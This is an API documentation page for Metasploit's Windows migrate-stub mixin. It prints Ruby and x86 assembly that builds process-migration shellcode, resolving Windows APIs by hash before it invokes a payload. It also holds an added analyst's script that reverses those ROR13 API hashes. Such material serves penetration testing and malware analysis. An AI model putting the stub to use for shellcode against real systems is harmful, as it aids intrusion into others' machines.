Module: Msf::Payload::Windows::MigrateCommon

Includes:
Msf::Payload::Windows, BlockApi
Included in:
MigrateHttp, MigrateNamedPipe, MigrateTcp
Defined in:
lib/msf/core/payload/windows/migrate_common.rb

Overview

Not really a payload, but more a mixin that lets common functionality live in a spot that makes sense, so that code duplication is reduced.

Instance Method Summary

Methods included from BlockApi

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #initialize, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #initialize, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#generate(opts = {}) ⇒ Object

Constructs the migrate stub on the fly

# File 'lib/msf/core/payload/windows/migrate_common.rb', line 20

def generate(opts={})
  asm = %Q^
  migrate:
    cld                 ; clear the direction flag so string operations move forward
    pop esi
    pop esi             ; esi now contains the pointer to the migrate context
    sub esp, 0x2000     ; give the stub its own stack region 0x2000 bytes below the current esp
    call start          ; pushes the address of the block API code that follows
    #{asm_block_api}
  start:
    pop ebp             ; ebp now points at the block API resolver, invoked via `call ebp`
  #{generate_migrate(opts)}
  signal_event:
    push dword [esi]    ; Event handle is pointed at by esi
    push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
    call ebp            ; SetEvent(handle)
  call_payload:
    call dword [esi+8]  ; Invoke the associated payload
  ^

  # Assemble the stub for x86 and return the raw shellcode bytes
  Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
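Added example, not Metasploit's own code: a stand-alone Ruby reimplementation of the ROR13 hash behind `Rex::Text.block_api_hash`, used the way an analyst would when reading a stub like the one above, to map the `push <imm32> ; call ebp` constants back to API names. The candidate list and the `resolve_hash` helper are assumptions for illustration.

```ruby
# Added example (not Metasploit's own code): reimplements the ROR13 "block API"
# hash that Rex::Text.block_api_hash produces and uses it to resolve the hash
# constants pushed before `call ebp` in a migrate stub or stager.

# 32-bit rotate right.
def ror32(value, count)
  ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF
end

# For each byte: rotate the running hash right by 13, then add the byte.
def ror13_hash(bytes)
  bytes.each_byte.reduce(0) { |h, b| (ror32(h, 13) + b) & 0xFFFFFFFF }
end

# The module name is upper-cased, encoded as UTF-16LE and hashed including its
# terminating wide NUL (block_api.asm walks BaseDllName.MaximumLength bytes);
# the export name is hashed as ASCII including its NUL terminator.
def block_api_hash(mod, fun)
  unicode_mod = (mod.upcase + "\x00").encode('UTF-16LE').b
  (ror13_hash(unicode_mod) + ror13_hash(fun + "\x00")) & 0xFFFFFFFF
end

# Constructed candidate list of APIs such stubs commonly resolve (assumption).
CANDIDATES = [
  ['kernel32.dll', 'SetEvent'], ['kernel32.dll', 'LoadLibraryA'],
  ['kernel32.dll', 'ExitProcess'], ['kernel32.dll', 'VirtualAlloc'],
  ['kernel32.dll', 'CreateThread'], ['ws2_32.dll', 'WSAStartup'],
].freeze

# Precomputed hash -> "module!function" lookup table.
HASH_TABLE = CANDIDATES.to_h { |m, f| [block_api_hash(m, f), "#{m}!#{f}"] }.freeze

# Resolve an immediate seen in disassembly; nil if it is not in the table.
def resolve_hash(imm32)
  HASH_TABLE[imm32 & 0xFFFFFFFF]
end
```

Feeding it the immediate pushed at `signal_event:` in the stub above resolves to `kernel32.dll!SetEvent`, which is how an analyst confirms what a hash-only stub is calling.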